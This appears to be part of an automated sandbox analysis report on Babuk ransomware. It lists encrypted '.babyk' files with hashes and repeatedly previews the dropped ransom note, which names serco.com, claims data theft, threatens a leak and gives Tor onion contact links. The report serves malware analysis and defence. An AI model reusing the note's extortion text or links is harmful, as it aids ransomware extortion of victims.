                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8147976432935
                                                                            Encrypted:false
                                                                            SSDEEP:24:gZfqtAI2v6r8P5ZgWpVBvvsb+Ep1dpz45XDfPpqGFoEeiUVkUKDu:gN96ruZgW/hkb3i9pqsoEtUVkUKDu
                                                                            MD5:C18557126A6C8082DB39653D3AD74FF4
                                                                            SHA1:396F98DE8C095354A3B6261E6698E06370529BFC
                                                                            SHA-256:C950D09B96205784D9A21F656532D0065CD51C781D3A2F8C2409EA0ED5AE50ED
                                                                            SHA-512:182D0C669384B4AAE73EB553F008D569DA24EF696DC647D0B89E3C92E3D9CB5583D345742A7BBE810C6DA6CC7F7A66D3448826BE6140E42D023395AAC4A5196A
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\MXPXCVPDVN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\Microsoft Edge.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1585
                                                                            Entropy (8bit):7.891924315021363
                                                                            Encrypted:false
                                                                            SSDEEP:48:zpYmw0zGOpTbuOMXsERUDOubP9EUFmfqp4e/I:umwMlEYZbP9BWaI
                                                                            MD5:96ECCC8E275A147FEB5709FACB50A92A
                                                                            SHA1:0EAA8C909094F64CE07C0556352B3B27925D210F
                                                                            SHA-256:917DC423197CE11CE4E0A15576FEBB9B5D41629F84F209C7BDF2A1E8F5B0D7A9
                                                                            SHA-512:32E8D968EA0727C4372655902437F355EE70EC261EBFA6EA1477425F0EF6C7BDA8CD5855371EAC27401D1640FABBA10D9C57D121CF5F3E847FB435054EBAA3D8
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.819435520685918
                                                                            Encrypted:false
                                                                            SSDEEP:24:fE1FEmqtmnapptNBH2J/kCkD9lc+oAQkYXp8KdWkqef2D:fEU7mniPLW/kl7c+TQnCcWpek
                                                                            MD5:390F523B40011382770374A5B62EF74A
                                                                            SHA1:E249D8AAA982326EC4848351B1FEE7251C4E9CCA
                                                                            SHA-256:B26642978B65AE3315C57E8D627D5053B254A7EC006A151905D4416D41F892A2
                                                                            SHA-512:5447420B7F857034EBEEF53FDF935A9A57B7AACD20C0C73E544E427B1D4E10CF28D4C196DF83D3F676E8B69C1FD245D63D24CA56F1F5B4245759B6E10534568B
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.828479071010184
                                                                            Encrypted:false
                                                                            SSDEEP:24:oeQZAGCsaNPb0Jcl0RXwL5jilGiH0JqKS7XOaEHfat3FRy/QrxdwhpZd5:onNCsa1b0JcaRS5W4iH0JxGXOr/a9FRS
                                                                            MD5:FEA4FA9896AFF341566796F6D186DCC2
                                                                            SHA1:347323C035B17CCD7262FCF4C9934A156CB3D39B
                                                                            SHA-256:718E1BDF908672AA4CE93ED77E509D9AC416C5D26505E9D186BCC9C0352DEE70
                                                                            SHA-512:2EB04F8BE7B5C81C6CD3AFDBDDD5BEE1D71D603297EF89E82C772B4DC5FC00E0F84BAC2A13109CE03FC6457BF8745BF020B561B78CD55DC5569DF3120539BA09
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.826717723102005
                                                                            Encrypted:false
                                                                            SSDEEP:24:thWi0jLGKi3F5EtQ86IpX6iuX9jMTqsjK1GMZzjhWRqFUzr42HmbJo04DQanTQtP:tnULGKeFqO8pKiuNt1VMp5Hmr4DLnkzJ
                                                                            MD5:622F19758CDBBF0434F2B277A86B691A
                                                                            SHA1:D0E91227CE0885FF88C582ABDBA05BC6DB88B0BF
                                                                            SHA-256:8AEA1F08B9FCF00CEC329677EA9A55B22BC43A8046F30F4E7DB6D80EE206ABBC
                                                                            SHA-512:CE7FFF4390C5A30111D16A078F88A69B7F286244438A4D6C024266DF9D4CB2E450D6FB45ADA02F5E2A27CCDAE8922F6D63DFA1FBBF5264CBE8C44E4214690961
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.838022289176802
                                                                            Encrypted:false
                                                                            SSDEEP:24:1tkYXe1CpFL5qe8caIehF9NAghmZ1BJM0LU0vcsdY:1WskCpvqewhFzp4v/M84
                                                                            MD5:7FD96B3F3596DA519D214B3C8ACCF10E
                                                                            SHA1:E673FFD802DF2FCAECB5272A15236471A0F1CA3B
                                                                            SHA-256:22CDBF78204A69E956F83E2638A9F5A64B5D0F451A418C781165A3B9198FBF36
                                                                            SHA-512:E5B3A53EF6BCCE7FA2DE62D64995A259096D7BA3C6509B59EAD12A97FF1DA726BF4C16A334AF835FC441FECF91D66345BC2582B200955BA658E77760FE4FF62D
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8390162441802245
                                                                            Encrypted:false
                                                                            SSDEEP:24:LLSXb83bTpjhXDFf3Bljo1BOVEEP7DPRseLgrRENNT1Hl9rG7:SAbdFzFvB/EEP/nENwX9rG7
                                                                            MD5:0C84598E7C22F4961DB002E7309EECF7
                                                                            SHA1:A301EB7C1A5A40F98A3AA9CA977E772C4BA54725
                                                                            SHA-256:BA704571B1D99DFD8E7E3225BB78DBE0B7B49CA4FC7543D9C3335E8C2A71ACAB
                                                                            SHA-512:D95A4AFF3B99220F1CB89EB48A7A315302E87586E8C9D170BFDFF79488BA98170CE7AF8F9B017998E834A1F27901026DB0D87992C859F3846BC73AE92C771226
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.817049618198603
                                                                            Encrypted:false
                                                                            SSDEEP:24:bl5NDuRjYpnASwQgZHrCpm3tboBCVyL6yU2VPVaGq8YZQyMt9wxhFd:x5NDwvdZH2pm3SB1L6d2vaGqH6Z8xhz
                                                                            MD5:AD53B52996C9A37FF059C42A3A5E88DC
                                                                            SHA1:5228078B63E3687E31858A00AEAB33C1891118C6
                                                                            SHA-256:F4718AD2ABCB6D84E98250DAD4B1B55E2A8DCA300637DE13E6EA1C94E85B7DE3
                                                                            SHA-512:75355B07870FE977EA7B5C1647172EC045112852A455D2F983BE62D443D5A58B61BC355640D2F2140D08ECB0CB998E3BDF917B40906BC6C6C785E599945D5596
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.805722642116579
                                                                            Encrypted:false
                                                                            SSDEEP:12:S/jDahhc/EAUL+W77HrYmWkFKcSHPkLEeFAzWXy93Wpok5m++ltBBzuMiIHAev6a:6uhhyjEUcw/VzHAlmEIImhgIPIWJtKO
                                                                            MD5:FF20ED8E204B25D53FF57E0207E4BA76
                                                                            SHA1:72B0C013BD0CD4E1BE5BAA3E160DBF5E0FD3A542
                                                                            SHA-256:0B26003A7923801C2DFC34B6E428C89AB72999A36B9BE769D11D19E5462CA6C2
                                                                            SHA-512:FF902D0649DEB8451E50727907CE982FDCA5F72215E5C114153B5F93C0FEA4D83D038872FB73E12DF042636EA9BA04458E5D81BDAB85DBFF8045259629E50BFD
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.831972269902191
                                                                            Encrypted:false
                                                                            SSDEEP:24:OUJwdSr6yp/dcE1eS5oTKc6tURjv4iN33piZa3zsdLh8tpWhmb77r7cVo:cdSr6Ud119mefUtFp5zW8WhS77r7cVo
                                                                            MD5:EE2B09AA3B7FED3DFA8D9D9656170BD6
                                                                            SHA1:C21D77782F591ABF08825EA10FAD0FD3E9D1A221
                                                                            SHA-256:28C7C22C0DA38FAC12C9A273C11EF85E16221993BA57949E1DB4763F3D4D6D38
                                                                            SHA-512:37AB89F808CF48F4DA422F5B012BE6CDF27D9BE724BB47AF4A2A6B33B9B41B5784EB655D76DCC4FA56C9DA0F2747FA80AD8C0D31B698C59DA5758076E7310139
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.806836951337706
                                                                            Encrypted:false
                                                                            SSDEEP:24:t4WeM7B8vBOKIslNoMBIz2m00Ug6bG5sdUFTyhu/7737nLQMn3nRrENvkFGk3bMK:txeZJzKzP0w6bGfEQzHD3Rr2A+Dq
                                                                            MD5:7B53F87AEFABD5944F56725B1C4EA239
                                                                            SHA1:BA81BDC4B0B3622E81F5E70DBAC743564BB233B7
                                                                            SHA-256:466502A9DA0D44FA39F35243C7AFEC74E869C741931A121CADDCA9A392398F1E
                                                                            SHA-512:CF43C3EBC1633C7712E6FE43F514A0FCD35FAEFACC9447CE4435D73FAB39631D433BA0FA979A8AB747D727CE22D9561283C0A4705BEF2D0A1E7D4C538E5EEDBF
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\PIVFAGEAAV\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\QCFWYSKMHA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.807661539777658
                                                                            Encrypted:false
                                                                            SSDEEP:24:Fsuk52f8AoJ5JHqpSHJYg+sSPNbqISFg7cnoIy8rrB/D74/6jkG9:elEkpBnOPNbq2cnS014s
                                                                            MD5:134474BC5030A5B383F19C42C8016AB2
                                                                            SHA1:FDF47983E0FFB94CCBEC1734B9093F5610D3D038
                                                                            SHA-256:78F1E4F6220BC5C602D766341D5BD882507134CB3F749E36F3BAED2CB480B943
                                                                            SHA-512:C8C3E3D0663182B44FFD0A79576E530BC90E197FEE420E7FD0880FB4A36A863EFC79D10FBE29A71FC68AD20D9394B6B9213EB1543AB18A3E3A63104FF9989B7A
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\RAYHIWGKDI.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.823360246163598
                                                                            Encrypted:false
                                                                            SSDEEP:24:g6ig95Q5A1A3YgNuPgkMj5bCItanINiwvsgelGs1TE7deZpjs:gXbIAoAvbN5kINLvpelt1edeE
                                                                            MD5:D48CDFB2FC6B8CB07B5302F68D415314
                                                                            SHA1:252D651EA2662406C9F8E758A2EA5E1FE8F1B1B9
                                                                            SHA-256:51F07622087899241A29FE0A13C3E2C2C991D88DBCBBAF52492421717EC5D76A
                                                                            SHA-512:AE8EE2BD137261D589C38397DBDD9EF0E9B81075342BA5AC7F64AD6DC398CFF048D0E9B90235B3AD01921953C561C318E497E4DBD7C2786EB0F942016A387DFE
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\SQRKHNBNYN.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.782193700135727
                                                                            Encrypted:false
                                                                            SSDEEP:24:gPx6PlK9gKqNzkpnYGc14t4pOEigIhCKuwAwYvmn0XIw0x6ZTgf:gGMg/Nzkfc14r5fiwAwYvmn0IVzf
                                                                            MD5:71A85286AE50488F587667B5336E4708
                                                                            SHA1:387BE4BEB1A1777E1255F1EB378FDE90D0950C55
                                                                            SHA-256:7D2C0944E2C8E0ABC027F045D2000D0901D3E3AAF69E5D2326E5305BF5A45921
                                                                            SHA-512:CA458E9FB0129CD137F56489B3607E3A84CE34383D7B3C0FCFDFDAE543091F8E05E67D3CF0261E2FA5D8BD69CF410813672C2E6D0088AE090E45B9CDC7BF9C4C
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.827213563770364
                                                                            Encrypted:false
                                                                            SSDEEP:24:tHizmFxcLPAU0k2g5zNHxEJJq9cB0SNCJ3wfCb+0fDtbaXhaA70kryVhwClKE:tCaFxS1jL5BRYhB0SUMCC0bpar70u2UE
                                                                            MD5:C002FF978FB925267F0B1C93321F27C1
                                                                            SHA1:C6DFB74B68C986183B1087D43F3B45A835D5A714
                                                                            SHA-256:C15F711250E82174C240E3F6DAB5893527854A3F17323BB67C839561BF673BCF
                                                                            SHA-512:1F5E9A71224FA066E6C2D19CAC140E69C1C0A18E77F6E10B8C505287AC8526C24F153180662C6A48D4D3170A9AF6875B6287E005B2F77EE522C61D82B0312F3D
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\Word 2016.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2836
                                                                            Entropy (8bit):7.933617104666585
                                                                            Encrypted:false
                                                                            SSDEEP:48:WnU7Xpbi9F+vv0IU2D+BcQZcvy4kVO3cVSQTOktRWYMVhubMj7Cu9hp5AlTytp:WnKXpboSv0ITKBce4COebJMGbm7Cu9/h
                                                                            MD5:EEB204C30ED7766F4A1636A4DDD7D4CA
                                                                            SHA1:5D889A7522A96C8B34E09414CFC288033B46C3F2
                                                                            SHA-256:E69992ECBD8EECB7C0B2EAF75B74C7F3478984080D8600803FB8FBD1DDC6FF0D
                                                                            SHA-512:0CC3320ABDFE06954E8844AE48C6213193794A4D5049FBC1BE89836708B4EF24707FF86B9343E7B9ED1F35180AA1B0FFF7B1C9C35704366504EB8FC4C6FA9639
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.837528282296751
                                                                            Encrypted:false
                                                                            SSDEEP:24:21fR5yDbgQjSjLfPpfHJ4rnsitxuiApRhl7GK64j3INFEDn:21fR5yDbgYS3PpfsnsiXAHhL6O3INFEz
                                                                            MD5:191E32F5BF9D10496997A5EC2A484359
                                                                            SHA1:B37EEF5943043884D82B1F5EFDE5B4364909FE98
                                                                            SHA-256:94A7504D9CE3F722F4300DCDB48BA2D058B44B3E348A68CAB34271185E206F5E
                                                                            SHA-512:01833A230979B50231416CFEB694DBBAA0B27AF0FE622C20A165BC33CCC78F2C4F3BF81115F87EE05B21033102443D63CECCA43651957D97A06F5B6E0CC46FA1
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.816528475855436
                                                                            Encrypted:false
                                                                            SSDEEP:24:chEv7s5Hovw0/oUd4lQnApFW5crvrqK/DGx73DAV+Vozo2iBJ+:chEzs5Ivw0xdyDgcrvV/DGNzAV+Voc2n
                                                                            MD5:7A94AA5B83B43AA161A52E51BDB506A7
                                                                            SHA1:D7A68C5EB67C5987FFA53AE474E0E6D72DF69C42
                                                                            SHA-256:B0F8FAA427DED1AA8E7CE646BCA0302C17028047311F74391708865E77DA5680
                                                                            SHA-512:2C3317BBCDB60E90B4F5F662EAC1EE3070475D7F2EB4E94A1F2B2A4DA7A46791C7FF571A8992E20B42DFF94183969011951C411286B85E957A48F8E924C39711
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8575538085670456
                                                                            Encrypted:false
                                                                            SSDEEP:24:rwfuHhJgzust3xQ9z5413eay0pMajUOgsS312wmil4/KD4+BztsuJR60Fof1d:cfuGtBUz54FFysfUOgsG16/Klzh60Ed
                                                                            MD5:B86F85295A355A7C1CC34EC665EE4DF6
                                                                            SHA1:45D4AB8EDA46987CB6033FA0C0A672EF83323748
                                                                            SHA-256:57428D776FF64789E909C68ADE999385B39B54078481DD0CF4EBC6F21309611E
                                                                            SHA-512:3DC9BB912E6962E864F2AB2C0E12B66EA7FC276C1E26A918C7CCBEBCE48A6FEA66DC6FC062BA436CF9719B530D5C53186C1225C4F0C27EC4064A3A95538224F3
                                                                            Malicious:false
                                                                            C:\Users\user\Desktop\ZTGJILHXQB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.836998490283924
                                                                            Encrypted:false
                                                                            SSDEEP:24:rbSrgm69ZepgjyQs0TpQJ/wqQQ3A+Y5bBaw11VCfXG:rbSrS9IpgmQs0Tp+wU3ivtCPG
                                                                            MD5:9D6FC48BE559DA442EB10CF91D761EBE
                                                                            SHA1:573EA6627D39539275D8F6B4361E5AE7B7D63767
                                                                            SHA-256:0CAFD7A5453BC166659A86B80E3DE26598BF14BFBEED43CB844C3DC62F2CEEF4
                                                                            SHA-512:C1A713B3B6EB475EA0530C138E0AE7E025E2584DD367F5FD9E8BBC7EF1D03EF12600E580165E9C789BB8A689C401399ECD1646BA3F65ADEA2F2B9E54ACBFF105
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.829972899391189
                                                                            Encrypted:false
                                                                            SSDEEP:24:pAcqzwVITShbOyi+GBr55V2aj3u90TgGz:pAcqM2Ii+GD243uInz
                                                                            MD5:AC6063FF5AF7055897CEE3C86945EE9C
                                                                            SHA1:ADF2F7894D1567724EF2D0E649C78EC76776B3DB
                                                                            SHA-256:639459331D9346CF50EE6DE2E981CEEBE2417DCB1FED3275A99A7EE5195DBD32
                                                                            SHA-512:CA0BCFB7A4D6317CD23A4ED8B1E04F9DD3D0260C6E8976DDB8FDD1234DB30CE2C1FE7C288DF71E1E561A0D632C69B448046F8BEB6A078AF4C836E610FC3F9CC1
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\CURQNKVOIX.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.840021286332168
                                                                            Encrypted:false
                                                                            SSDEEP:24:pXy7Jxksn1utczbrbws00hEl2SE/VlcNxKYCnzJrwOKGyXVtX:1y7o4utczbr30PHE2GzRwOKGah
                                                                            MD5:71C2063C23EBA1592FDE934842C219BB
                                                                            SHA1:E51696E91294B2DC24650673EDB57419CB942C7C
                                                                            SHA-256:D36D890A2AB190C63DB3ACFE26E960AA1D6B029055826752D63A5C4B405BE8C0
                                                                            SHA-512:2A8FBFC8ACE74DC8B7A29346E5AAE7602CAE743D10B0D04D0F396A3861B185F03DA90AAC0A283C9146F09DE8CCEDE8CF01D30C3FD260572041751FC33000358D
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\CURQNKVOIX\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.830813767661178
                                                                            Encrypted:false
                                                                            SSDEEP:24:XnErmvuLGCwEUmosY9CsaOzrBDALL1r1zD0zVdPLOZGP3/nn1ssYLqOvs:XChwEUm5XNuNAVrhUfvXSsYeOU
                                                                            MD5:E9A5920310E78DE223FF624E393AA11B
                                                                            SHA1:13A7B4B457FEA68DB20755BB958A452219522447
